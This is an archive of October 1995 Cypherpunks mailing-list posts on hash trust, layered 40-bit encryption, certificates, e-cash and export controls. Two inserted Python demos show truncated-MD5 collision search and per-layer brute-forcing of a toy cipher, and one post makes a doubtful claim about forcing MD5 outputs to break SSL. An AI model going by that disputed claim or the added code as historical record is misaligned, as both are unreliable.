  -- Caused customers who had suffered losses to engage in ever more complex transactions that were supposed to recoup losses but that often brought on even more problems
DATA: BUSINESS WEEK, COURT FILINGS


By Kelley Holland and Linda Himelstein in New York, with Zachary Schiller in Cleveland

Copyright 1995 The McGraw-Hill Companies All rights reserved. Any use is subject to (1) terms and conditions of this service and (2) rules stated under ``Read This First'' in the ``About Business Week'' area.




Transmitted: 95-10-04 19:59:07 EDT (B34461)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 24 Oct 95 12:52:50 PDT
To: cypherpunks@toad.com
Subject: (fwd) Chaum vs. Stein
Message-ID: <v02120d02acb2f46481bb@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

To: www-buyinfo <www-buyinfo.allegra..att..com@mail.checkfree.com>
From: Andrew Barrett/CheckFree Corporation
  <Andrew_Barrett@checkfree.com>
Date: 24 Oct 95 13:38:40 EDT
Subject: Chaum vs. Stein
Mime-Version: 1.0

Wanted to save my 'me too' until a time I could piggy-back it onto something a
little more pithy (and I DO mean 'little'). Robert, thanks for taking the time
and energy for filtering cpx and forwarding the best. David, thanks for
providing the forum. Now that  _that's_  out of the way ...

I've just been handed a registration booklet for The Bank Administration
Institute's Retail Delivery '95 conference December 2-6 in Atlanta. Notable
speakers include The Bill, MasterCard CEO Eugene Lockhart, Visa International
CEO Edmund Jensen, Intuit CEO Scott Cook and Checkfree CEO Pete Kight (among
others).

Featured on page 6 is a "Fireside Chat: The Financial Marketplace of the
Future" moderated by Lou Dobbs... How warm and fuzzy. What really caught my eye
was a panel discussion on Internet Security scheduled for that Wednesday. The
panelists are David Chaum, Cybercash CEO William Melton, and FV CEO Lee Stein.

If anyone goes, tell us all how it went!

Kicker -  the postal frank is of the "non-profit organization" variety.
BAI's site is at http://www.bai.org

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Mittelhauser <jonm@netscape.com>
Date: Tue, 24 Oct 95 16:01:55 PDT
To: cypherpunks@toad.com
Subject: Re: Does your software?
In-Reply-To: <199510241710.NAA18747@jafar.sware.com>
Message-ID: <308D0DA4.7ED@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Dr. Frederick B. Cohen wrote:

> Yet it services more than one request per minute, 24 hours, 7 days, and
> has done so without denial of services, corruption, or leakage since its
> first implementation.  It's so small it can be verified, it's faster
> than the retail brand, and it doesn't have all the holes we keep finding
> in the other servers.  Different strokes for different folks.

I really tried to resist but....

1 request a minute!!!!  That's a whopping 1440 a day!  Try 20+ a second or
over a million a day which is the current rough load which most of our
servers on our site handle...(our peak day last week was 17 million hits).

I don't disagree that there is value in producing a trivial server which
can be guaranteed to have zero bugs (since it is so small).  It, however,
should be treated as an intellectual exercise.  Comparing it to a production-level
retail server is simply meaningless..they have different goals (as your last
post emphasized)...

-Jon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Tue, 24 Oct 95 13:04:15 PDT
To: cypherpunks@toad.com
Subject: Re: MD5 weakness ? [was Re: Netscape Logic Bomb detailed by IETF]
In-Reply-To: <199510241554.LAA27916@opine.cs.umass.edu>
Message-ID: <9510242001.AA16913@all.net>
MIME-Version: 1.0
Content-Type: text


...
> I believe Dr. Cohen's point is that no-one knows, AFAIK, how to prove that a
> one-way hash is truly one-way (uninvertible). We cannot prove that MD5 is
> secure, ergo we cannot (completely) trust it. [Please correct if this is a
> substantially incorrect inference.]
> 
> One of the standard responses is "it's the best we can do". When people said
> this about PGP, FBC made some (IMHO) interesting comments about the
> encryption he uses in various circumstances. Perhaps he would like to share
> his personal choices of one-way hash functions with us.

Since you asked:

It's a really complex issue.

	As a fundamental, we know that any "one-way" hash function must
be many-to-one, which means that, in practice, there are always large
numbers (2^large numbers) of sources for any given hash.  This means
that forgeries are always possible. 

	I know of no way to prove that (and no convincing argument that
the workload for creating) a forgery is hard for any "one-way" hash
function.  This seems to mean that we are always betting on faith about
these things. 

	The techniques that seem to be reasonably good are; modular
exponentiation in a modulus that's the product of two appropriate primes
(a.k.a.  RSA but throw out the private key when you create it); certain
classes of non-linear feedback shift registers of high degree; and some
general class of mixing algorithms like MD5. 

	The RSA-type hash is slow, and some great mathematician may show
up tomorrow and lay waste to the whole thing.  Non-linear feedback shift
registers have the advantage that we don't know how to factor
high-degree equations, so we don't know how to make simple closed form
solutions to find output values.  MD5-type systems are good because they
combine diffusion and confusion and avoid a lot of the more well-known
flaws as far as we know. 

	None of these reasons are particularly convincing, so I think we
have to take a risk management approach.  So the ultimate question here
is, how much are we willing to bet that nobody can break one of these in
the intended application over a particular time frame. 

	I trust the RSA and NLFSR systems, if reasonably well
implemented, for a single short time-frame low-valued transaction.  For
example, pick a good pseudo-random number and create an RSA one-way hash
of 512 bits (the random number issue is of course another whole area),
encrypt the first block, Xor with the second block, encrypt the result,
etc.  till done, then Xor again with the original random seed, send the
file and the hash along with the one-way key, and get a confirmation
back within a few days. 

	I don't trust any of them as a basis for running a major part of
an economy over open communications links, and I especially don't trust
them when combined or when the security of one depends on another.  To
run an economy, I think you need more redundancy, more personnel
security, more stop-loss capabilities, physically secure devices,
independent checks and balances, etc.

	Someone on this list mentioned that the banking system trusts
the RSA and MD5, etc.  but this seems to me to be a mischaracterization. 
They trust these systems to an extent, but they have key change
requirements, regular audits, physical security, relatively secured
communications lines (when compared to the Internet), strong procedural
controls (most of the time), and other such protections, and they still
get hammered for a few million now and then.

	This is probably enough for now, since the list is probably
getting tired of my posts and I have made the major points.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236
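
The many-to-one point in the message above, worked through as an added example (not part of the original post): a digest shortened to a few bits always has colliding inputs, and the only open question is how much work it takes to find them. The truncation widths and the sample messages are constructed for the demonstration, and MD5 is cut down only so the search finishes quickly.

```python
import hashlib


def truncated_md5(message: bytes, bits: int) -> int:
    """Top `bits` bits of the MD5 digest, as an integer."""
    digest = int.from_bytes(hashlib.md5(message).digest(), "big")
    return digest >> (128 - bits)


def find_collision(bits: int):
    """Hash distinct constructed messages until two share a truncated digest.

    By the pigeonhole principle this must stop within 2**bits + 1 messages;
    the birthday effect makes about 2**(bits/2) the typical cost.
    """
    seen = {}
    counter = 0
    while True:
        message = f"constructed-message-{counter}".encode()
        counter += 1
        tag = truncated_md5(message, bits)
        if tag in seen:
            return seen[tag], message, counter
        seen[tag] = message


def find_second_preimage(target: bytes, bits: int):
    """Find a different message whose truncated digest equals the target's.

    Typical cost is about 2**bits hashes, far more than a collision.
    """
    wanted = truncated_md5(target, bits)
    counter = 0
    while True:
        candidate = f"constructed-forgery-{counter}".encode()
        counter += 1
        if candidate != target and truncated_md5(candidate, bits) == wanted:
            return candidate, counter


def work_table(widths=(8, 12, 16, 20, 24)):
    """Measured collision work per width, next to the birthday estimate."""
    rows = []
    for bits in widths:
        _, _, trials = find_collision(bits)
        rows.append((bits, trials, 2 ** (bits // 2)))
    return rows


if __name__ == "__main__":
    for bits, trials, estimate in work_table():
        print(f"{bits:2d}-bit digest: collision after {trials} hashes "
              f"(birthday estimate ~{estimate})")
    forged, work = find_second_preimage(b"pay 100 to alice", 12)
    print(f"12-bit second preimage after {work} hashes: {forged!r}")
```

Each extra digest bit doubles the second-preimage work and each extra two bits doubles the collision work, which is the workload question the message says cannot be proven, only estimated.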



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@sware.com>
Date: Tue, 24 Oct 95 13:06:01 PDT
To: baldwin@RSA.COM (RobertW.Baldwin) (baldwin)
Subject: Re: 80 bit security from 40 bit exportable products
In-Reply-To: <9509248145.AA814557096@snail.rsa.com>
Message-ID: <199510242006.QAA19382@jafar.sware.com>
MIME-Version: 1.0
Content-Type: text/plain


baldwin writes:
> 
>         Long ago vendors should have put encryption into network layer
> products, but for a variety of reasons that effort was delayed or
> discouraged.  One effect of this lack is that almost every layer of
> the network stack is adding its own encryption.  For example, the
> HTTP session layer added S-HTTP and the TCP transport layer added
> SSL.  Soon we will have network layer encryption with IPsec.
>         The vendors for each layer can export a product that uses
> ciphers with 40 bit keys.  A user can then combine multiple
> products to get more than 40 bits worth of security.  For example,
> a web client might fetch an S-HTTP page over an SSL protected link
> via a firewall that supports IPsec tunnels.  That's three 40 bit
> keys protecting the data over the internet link (of course, this
> may not be equivalent to a 120 bit cipher, that depends on the
> details of the cipher systems and independence of the key setups).
> Interesting possibilities.
>                 --Bob Baldwin

Even if you assume complete independence of key setup, if a successful
decryption at each layer can be independently detected and verified
(which seems likely in your example), there're only about 3 * (2 ^ 40)
total operations in the worst case, NOT 2 ^ (3 * 40) operations needed
to expose the plaintext.  This is an effective 41.5 bits, not 120.


-- Jeff
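
The arithmetic in the reply above, as an added example (not part of the original message): three stacked layers, each with its own small key and its own recognisable framing, are searched one layer at a time, so the cost adds instead of multiplying. The toy keystream cipher, the 12-bit key size and the per-layer marker strings are assumptions constructed for the demonstration; they stand in for the S-HTTP, SSL and IPsec layers named in the quoted text.

```python
import hashlib
import math

KEY_BITS = 12  # constructed: scaled down from 40 bits so the search finishes in seconds
# Constructed markers standing in for the recognisable structure each layer
# carries, innermost layer first (application, transport, network).
MAGICS = [b"SHTTP/", b"SSLREC", b"IPSEC/"]


def keystream(key: int, layer: int, length: int) -> bytes:
    """Toy keystream: SHA-256 in counter mode over (layer, key)."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(f"{layer}:{key}:{counter}".encode()).digest()
        counter += 1
    return bytes(out[:length])


def xor(data: bytes, stream: bytes) -> bytes:
    return bytes(a ^ b for a, b in zip(data, stream))


def wrap(payload: bytes, keys) -> bytes:
    """Frame and encrypt the payload once per layer, innermost first."""
    for layer, key in enumerate(keys):
        framed = MAGICS[layer] + payload
        payload = xor(framed, keystream(key, layer, len(framed)))
    return payload


def peel(ciphertext: bytes):
    """Search each layer's key space separately, outermost layer first.

    A guess is accepted when the layer's marker appears, which is the
    "independently detected and verified" condition from the message.
    Returns (plaintext, keys innermost-first, total key trials).
    """
    data, found, trials = ciphertext, [], 0
    for layer in reversed(range(len(MAGICS))):
        magic = MAGICS[layer]
        for guess in range(2 ** KEY_BITS):
            trials += 1
            head = xor(data[:len(magic)], keystream(guess, layer, len(magic)))
            if head == magic:
                data = xor(data, keystream(guess, layer, len(data)))[len(magic):]
                found.append(guess)
                break
        else:
            raise ValueError(f"no key found for layer {layer}")
    return data, found[::-1], trials


def effective_bits(layers: int, key_bits: int) -> float:
    """log2 of the worst-case work when layers fall one at a time."""
    return key_bits + math.log2(layers)


if __name__ == "__main__":
    keys = [0xABC, 0x123, 0xFFF]          # constructed sample keys
    sealed = wrap(b"constructed sample page body", keys)
    plaintext, found, trials = peel(sealed)
    print(plaintext, [hex(k) for k in found])
    print(f"trials used: {trials} (worst case {3 * 2 ** KEY_BITS}, "
          f"joint search would be {2 ** (3 * KEY_BITS)})")
    print(f"3 layers of 40-bit keys: {effective_bits(3, 40):.2f} bits, not 120")
```

The design consequence is that stacking short-key layers adds only log2(number of layers) bits whenever each layer's output can be recognised on its own; a single cipher with a longer key is what raises the work factor.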



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@cs.monash.edu.au>
Date: Mon, 23 Oct 95 23:15:27 PDT
To: patrick@Verity.COM (Patrick Horgan)
Subject: Re: [reformatted] how secure can privasoft be?
In-Reply-To: <9510240512.AA07092@cantina.verity.com>
Message-ID: <199510240608.QAA27721@molly.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello patrick@Verity.COM (Patrick Horgan)
  and cypherpunks@toad.com, jirib@cs.monash.edu.au
  and futplex@pseudonym.com, privsoft@ix.netcom.com

...
> > > (0) PrivaSoft actually uses a key longer than 9 digits, and someone just made

JB (that's me!) wrote:
> > Could it be 9 hex digits = 36 bits?

PH wrote:
> A nine digit number, 999,999,999 can be stored as 0x3b9ac9ff. Note that this is
...

I meant "what if it's mis-reported and actually goes up to FFF,FFF,FFF?".

> > > The information contents a clear message
> > 
> > This is a strange title (I suspect "of" dropped out), but it might
> > well sum it all up :-)
> 
> Nah, I suggested they reformat into 80 columns and suggested a different title
> for this section, but they went with it.  They wanted it fer sure.  I just don't
> know what it means.

Well, if this is actually what they wanted to say, then the 
interpretation I was alluding to was that the contents of the message
is [sent in the] clear.

...
> > This can at most buy you a constant factor - useful, but not very.
...
> Someone else on this list mentioned that an edge detection algorithm 
...
> It could give you a quick go/no go.

Don't forget that in most cases it'll be obvious that it's the wrong
key - only when it isn't would you submit the thing to a second-level
analyzer to check for edges/characters etc.

...
> > > The cryptographic engine can be customer-furnished and customer integrated, 
...
> > What do they mean by this bit?
...

> They mean that if you don't feel secure with theirs, you could use yours in
> their framework...

What, at the end of a release praising the security of their own thing?

> it's the pluggable encryption that NSA has had such a hard
> time with but seems to be in favor of now.

Alternatively their whole *framework* is bogus so NSA isn't concerned
about what encryption you use in the middle. Just another possibility.


Ah well...

Jiri
- --
<jirib@cs.monash.edu.au>     <jiri@melb.dialix.oz.au>     PGP 463A14D5

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMIyCvSxV6mvvBgf5AQFjkwQA1tr1wqgXDCwf3MWhCVJCmmNWQvyA1fHl
4LR7KXxZyPwcBnPFtD9/+sdgL7opnK8E79AXMzgxNJJhvvggHz5dzFmrM6AjKLoK
CiQcIVuZSZ66pxaS+S5bH5R3ZSO/IrbOkt5l1RYuSlow6UCyEcsjbiWSnfaIzdnY
nhvFhDsgfyM=
=ZXzd
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <asb@nexor.co.uk>
Date: Tue, 24 Oct 95 09:32:07 PDT
To: cypherpunks@toad.com
Subject: Re: MD5 weakness ? [was Re: Netscape Logic Bomb detailed by IETF]
In-Reply-To: <9510241442.AA12411@all.net>
Message-ID: <Pine.SOL.3.91.951024162454.14187B-100000@eagle.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 24 Oct 1995, Dr. Frederick B. Cohen wrote:

> [...]
> In the case of the trust being placed in MD5 by Netscape, the assumption
> being made (without adequate support as far as I can tell) is that an
> MD5 checksum cannot be forced, through a chosen plaintext attack, to
> yield checksums of 1, 2, 3, 5, 7, 9, ...  on up to enough primes to
> allow the known plaintext attack that gets the RSA private key used to
> authenticate messages.  As far as I am aware (and I may not be aware of
> everything) there is no reference work to support this assumption.  If
> the assumption is wrong, then the whole SSL can fall to a selected
> plaintext attack launchable (presumably) through those general purpose
> Java applets we have heard so much about.

The above paragraph is complete crap.


- Andy, speaking only for himself.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Mon, 23 Oct 95 23:33:31 PDT
To: tomw@cthulhu.engr.sgi.com
Subject: Re: Certificate proposal
In-Reply-To: <199510142157.OAA07731@orac.engr.sgi.com>
Message-ID: <199510240632.QAA07541@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello tomw@orac.engr.sgi.com (Tom Weinstein) [tomw@cthulhu.engr.sgi.com]
  and cypherpunks@toad.com

TW writes:
> > In article <199510120147.LAA13833@sweeney.cs.monash.edu.au>,
> > Jiri Baum <jirib@sweeney.cs.monash.edu.au> wrote:
> >> What you are missing is that you should not say
> >> "I want to send my credit card number to Egghead Software"
> >> you should say
> >> "I want to send my credit card number to 12 34 56 78 9A BC DE F0"
> 
> > Why does this sound so much like defining the problem away?

To some extent it is...

> > Maybe I just don't get it...
> 
> I agree.  Sending your cc# to a key or an IP address is not what you
> want to do.  As a consumer, I want to make sure that I send my cc# to
> the merchant I am buying from.

But how do you know that you want to send to Egghead Software in the
first place? EHS could be a MITM, maybe you really want to talk to
Eggfoot Software, but every e-mail Eggfoot sends out is intercepted
and changed to read "Egghead" (and vice versa)...

By the time you verify that Egghead is who you want, you could have just
as easily verified that the key is who you want. Thus skipping one step
and avoiding all the attacks applicable to that step.


Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMIyIdCxV6mvvBgf5AQHotgQAyEwKWYJR2sgvAyS0eQ45W3TXIaIMeKI2
darQyiz1nW70EY/X8gs3P4+MQnYF/d0QHw6dmyzrXTOYA1UgioEsB8OWy2S65uc5
PqwnVW7TL/e2tgFeuZc/nUvhw7wqgbxAJzhABlnhb6K1BwiEmYFQEqAU8x9Luczm
3cRJeqqKPYM=
=2Pdd
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 24 Oct 95 16:50:30 PDT
To: weidai@eskimo.com
Subject: Re: How can e-cash, even on-line cleared, protect payee identity?
Message-ID: <199510242349.QAA11382@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Tue, 24 Oct 95 13:51:45 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: USA Today Against ITAR & GAK
Message-ID: <199510242051.QAA27794@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


I'm pleased to report that USA Today editorializes today (Tuesday, Oct. 24, 
1995) against both ITAR and GAK. 

They get the chronology of the SSL brute-forcing and PRNG seed prediction
attacks on Netscape Navigator backwards, but they get many other things right
in a fairly short editorial. I am certainly encouraged by this development.
Someone at USA Today definitely got the message that the ITAR are a large
obstacle to net security in the U.S.

Some particularly apropos quotations (from pg. 12A):
 
On ITAR:
	"[After the Netscape hacks] the perception of the Internet as 
	 insecure was indelible. That needn't be. Encryption software 
	 available right now is exponentially more powerful and could 
	 make code breaking virtually impossible. Its use is blocked
	 by government export regulations that make the programs 
	 difficult if not impossible to market, even for domestic 
	 purposes."

On GAK:
	"[...] key escrow [...] may sound reasonable, but apply that 
	 reasoning to more mundane areas of life. What the government
	 is saying is yes, you can put bars on your windows, locks on
	 your doors and put your jewelry in a safe, but you have to
	 give us the keys and the combination because you might be a
	 crook."

That phrasing sounds rather familiar....

	"The [GAK] system -- which the FBI and the Commerce Department
	 declined to defend in an opposing view to this editorial [...]"

Now I find that surprising. Since when does the FBI not even try to justify
Clipper and its descendants in the newspapers ?

For foreign readers, I'll note that USA Today has easily the largest 
national circulation of any daily newspaper in the U.S.

[Letters to the editor can be emailed to usatoday@clark.net; they want you
 to give your snail-mail address and home and work phone numbers so they
 can check your identity.]

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Tue, 24 Oct 95 00:10:45 PDT
To: hfinney@shell.portal.com (Hal)
Subject: Re: subjective names and MITM
In-Reply-To: <199510061708.KAA27047@jobe.shell.portal.com>
Message-ID: <199510240659.QAA07645@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Hal <hfinney@shell.portal.com>
  and cypherpunks@toad.com

hfinney wrote (but didn't sign):
> jbaber@mi.leeds.ac.uk writes (where I have taken the liberty of
> reformatting for 80 columns):
> 
> > Now mail is far easier to fake/intercept than a digital
> > signature/encryption - at least I hope so. Therefore if Hal were to
...
> 
> Well, this is not necessarily the case.  A MITM may be signing my
> messages for me, and then putting them back the way they were before I
> am allowed to see them.  Granted, this would not be easy, and perhaps
...
> futile.  Doesn't this bother you?

The point is that what if there's a MITM who is changing the signatures
on the hfinney posts? What if originally they were signed "Alice" but
then a MITM went and substituted "Hal"?

Then any reputation I attached to Hal should really go to Alice, no?
And even when I get a certified key for Hal, I still can't really put
the reputation onto it, since maybe the reputation really belongs to
Alice.

Doesn't this bother you?

At least with digital signatures I can be certain that the same person
always signed the messages (and that ri cannot repudiate them), even
if I don't necessarily know who that person is. (I guess the issue
becomes plagiarism rather than impersonation.)


Hope that makes sense...

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMIyOySxV6mvvBgf5AQFJUQP/Wf8wHYUw4JbE4PBxWbSX1nzgOA2EYYsn
L2FuBjKuLXqAG+xRSdJe8ySgaqiPV1JWP16NX97x5YOkMH99DMH73DMmYntvmYy1
G6NdXxhejLQgv0vx0VmVCE171ACB4A+uNe3b6EAsbsKTvd3b5TOWDl9KFQ5wtqGf
VK0o3j6S95U=
=QdEN
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Tue, 24 Oct 95 17:13:22 PDT
To: cypherpunks@toad.com
Subject: Re: What is needed for S/MIME remailer ?
In-Reply-To: <9509248145.AA814556043@snail.rsa.com>
Message-ID: <308D8019.648F@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


baldwin , Robert W. Baldwin wrote:
> 
>         The other day I was wondering what it would take to make an
> anonymous remailer for an S/MIME client.  Implementing S/MIME from
> scratch is a lot of work given the lack of a public domain
> implementation, but it seems that a remailer could be built on top
> of a commercial email product that supported S/MIME.  The question
> is: What features should a commercial S/MIME email product have to
> make it easy to support a remailer?  Are there a small set of
> command line options that would greatly simplify a remailer
> implementation?

  S/MIME is mostly PKCS#7.  Eric Young is doing an implementation
of PKCS#7 for his SSLEAY package.  It seems like a good place
to start...

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Tue, 24 Oct 95 17:24:50 PDT
To: cypherpunks@toad.com
Subject: Re: Does your software?
In-Reply-To: <199510241710.NAA18747@jafar.sware.com>
Message-ID: <308D82CA.7AB2@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Dr. Frederick B. Cohen wrote:
> Yet it services more than one request per minute, 24 hours, 7 days, and
> has done so without denial of services, corruption, or leakage since its
> first implementation.  It's so small it can be verified, it's faster
> than the retail brand, and it doesn't have all the holes we keep finding
> in the other servers.  Different strokes for different folks.

  Is this the server running on port 80 of all.net?  I've tried connecting
to it quite a few times at various times of day and night, using
netscape and telnet, and all I ever get in response to 'GET /'
is a closed connection.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Tue, 24 Oct 95 14:15:57 PDT
To: cypherpunks@toad.com
Subject: CRYPTO '96 CFP
Message-ID: <9510242122.AA18209@merckx.info.att.com>
MIME-Version: 1.0
Content-Type: text/plain


                            CRYPTO '96

         August 18-22, 1996, Santa Barbara, California, USA

                          CALL FOR PAPERS


General Information:

Crypto '96, the Sixteenth Annual Crypto Conference, is organized by the
International Association for Cryptologic Research (IACR), in 
cooperation with the IEEE Computer Society Technical Committee on 
Security and Privacy, and the Computer Science Department of the 
University of California, Santa Barbara.  Original papers are solicited 
on all technical aspects of cryptology.

Instructions for Authors:

Please send a cover letter, one title page and 16 copies of an extended
abstract.  They must be received by the Program Chair at the address 
given below no later than February 14, 1996 (or postmarked by February 
4, 1996 and sent via airmail).

The cover letter must state: "This paper does not substantially 
duplicate work that any of the authors have published elsewhere or have 
submitted in parallel to any other conference or workshop that has 
proceedings."

The title page should contain the title, the names of the authors, their
postal and e-mail addresses and the short abstract; it should be made 
clear who is the author to whom correspondence should be sent.  The 
first page of the extended abstract should be an informal one-page
statement (that will not be published in the Proceedings) describing the 
content of the oral presentation that will be given at Crypto '96 in the 
event the paper is accepted (this statement is expected to be different 
from the short abstract of the paper).  This page and the extended 
abstract must be ANONYMOUS, i.e., they must contain no indication 
whatsoever of the identity of the author(s).  The main body of the 
extended abstract should start with the title, short abstract, and list 
of keywords.  This should be followed by a succinct statement 
appropriate for a non-specialist reader specifying the subject 
addressed, its background, the main achievements, and their significance 
to cryptology.  Technical details directed to the specialist should then 
follow.

Submissions are limited to 10 single-spaced pages of 11pt type, not 
counting the bibliography and clearly marked appendices.  Since referees 
are not required to read the appendices, the paper should be 
intelligible without them.  The paper including bibliography and 
appendices must run to no more than 15 pages.  These limits will be 
strictly enforced.

Unfortunately, because of the burdens on the Program Committee and
the need to keep strictly to the time schedule, we will have to
summarily reject any submission not in keeping with the above
instructions.

Authors are encouraged to make 2-sided copies if possible.  Please send 
submissions by post; unfortunately, we cannot accept submissions by    
e-mail or fax.

Notification of acceptance or rejection will be sent to authors on 
April 22, 1996.

Conference Proceedings:

Proceedings will be available at the meeting.  They will be published in
the Springer-Verlag Lecture Notes in Computer Science.  Clear
instructions about the final copy will be sent to authors of accepted
papers.  The final copies of the accepted papers will be due on June 1,
1996.  Final papers arriving too late will be removed from the main
program.  Authors of accepted papers must guarantee that their paper 
will be presented at the conference.

Stipends:

A limited number of stipends are available to those unable to obtain
funding to attend the conference.  Students whose papers are accepted 
and who will present the paper themselves are encouraged to apply if 
such assistance is needed.  Requests for stipends should be addressed to 
the general chair.

Send submissions to:

Neal Koblitz, Program Chair, Crypto '96
Dept. of Mathematics, Box 354350
University of Washington
Seattle, WA 98195 U.S.A.
Internet: koblitz@math.washington.edu
Phone: 1-206-543-4386

For other information contact:

Richard Graveman, General Chair, Crypto '96
Bellcore
444 Hoes Lane RM 1K-221
Piscataway, NJ 08854 U.S.A.
Internet: rfg@ctt.bellcore.com
Phone: 1-908-699-4611

Program Committee:

Neal Koblitz, Chair (Mathematics, University of Washington, USA)

Mihir Bellare (Computer Science, University of California at San Diego, USA)
Josh Benaloh (Microsoft, USA)
Matt Blaze (AT&T Bell Laboratories, USA)
Johannes Buchmann (Computer Science, Universitaet des Saarlandes, Germany)
Don Coppersmith (IBM Research, USA)
Joan Feigenbaum (AT&T Bell Laboratories, USA)
Andrew Klapper (Computer Science, University of Kentucky, USA)
Lars Knudsen (Computer Science, Ecole Normale Superieure, France)
Peter Landrock (Mathematics, Aarhus University, Denmark)
Tsutomu Matsumoto (Electrical & Computer Engineering, Yokohama National
University, Japan)
Chris Mitchell (Computer Science, University of London, UK)
Paul Van Oorschot (Bell-Northern Research, Canada)
Bart Preneel (Catholic University at Leuven, Belgium)
Rainer Rueppel (R3 Security Engineering, Switzerland)
Jacques Stern (Computer Science, Ecole Normale Superieure, France)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mail Delivery Subsystem <MAILER-DAEMON@sophos.com>
Date: Tue, 24 Oct 95 09:41:32 PDT
To: <cypherpunks@toad.com>
Subject: Returned mail: unknown mailer error 2
Message-ID: <199510241644.RAA10532@elbereth.sophos.com>
MIME-Version: 1.0
Content-Type: text/plain

The original message was received at Tue, 24 Oct 1995 17:44:00 +0100
from meriadoc.sophos.com [193.82.145.1]

   ----- The following addresses had delivery problems -----
|/home/ian/.mailscript  (unrecoverable error)
    (expanded from: <ian@elbereth.sophos.com>)

   ----- Transcript of session follows -----
/home/ian/.mailscript: syntax error near unexpected token `|/'
/home/ian/.mailscript: /home/ian/.mailscript: line 1: `|/usr/bin/filter -vo /home/ian/.elm/filterlog'
554 |/home/ian/.mailscript... unknown mailer error 2

   ----- Original message follows -----


From: cypherpunks@toad.com
Date: Tue, 24 Oct 1995 18:05:29 +0100
Apparently-To: ian@virusbtn.com

Hello




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Tue, 24 Oct 95 00:52:25 PDT
To: hfinney@shell.portal.com (Hal)
Subject: Re: How can e-cash, even on-line cleared, protect payee identity?
In-Reply-To: <199510232350.QAA17025@jobe.shell.portal.com>
Message-ID: <199510240749.RAA07855@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Hal <hfinney@shell.portal.com>
  and cypherpunks@toad.com

H wrote:
> "Simon Spero" <ses@tipper.oit.unc.edu>  wrote:

[about fully-anon ecash]
 
...
> There could be an issue of fraud, though,
> where Bob insists that Alice's coin was no good even though it actually
> was.
...

Cut'n'choose between Alice and Bob? Ie Alice asks Bob for half the blinds
to check that the proto-coins are true?

Apart from no-good proto-coins, is there any other way the coin
could be no good?

As for no-good proto-coins, it's Bob's fault, isn't it? Alice has 
a record of what Bob sent, and what she sent back. Anybody can check
that the latter is a bank-signed version of the former. Given this,
there's no need (from this) for Alice to know that the proto-coins are
good (if they aren't, Bob's an idiot, but there's not much Alice
can do about it - I guess given all the blinding factors the bank
could replace the coin, seeing that it signed a worthless one).

